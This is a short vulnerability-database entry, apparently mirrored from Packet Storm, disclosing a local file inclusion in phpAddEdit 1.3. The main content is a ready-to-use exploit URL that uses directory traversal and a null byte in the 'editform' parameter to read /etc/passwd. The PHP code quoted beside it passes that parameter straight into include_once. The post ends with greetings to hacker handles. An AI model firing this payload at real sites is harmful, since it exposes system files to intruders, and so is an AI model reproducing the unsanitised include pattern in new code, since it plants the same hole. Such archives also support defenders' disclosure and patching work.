Lucene search

K

phpAddEdit 1.3 Local File Inclusion

🗓️ 12 Dec 2008 00:00:00Reported by nuclearType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

phpAddEdit 1.3 Local File Inclusion vulnerability in addedit-render.ph

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`#phpaddedit-1.3 LFI  
  
  
#Author: nuclear  
  
  
#script:http://sourceforge.net/projects/phpaddedit/  
  
  
#vuln:http://target.com/addedit-render.php?editform=../../../../../../../etc/passwd%00  
  
  
#vulnerable code:  
if (!$formname && $_GET["editform"]) $formname = $_GET["editform"];  
...  
if ( $error_message || $error || !$_POST["submitval"] ) {  
include_once ($formname."-header.inc.php");  
include_once ($addeditcwd."addedit-create-form.php");  
include_once ($formname."-footer.inc.php");  
}  
  
  
  
  
#greetz Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo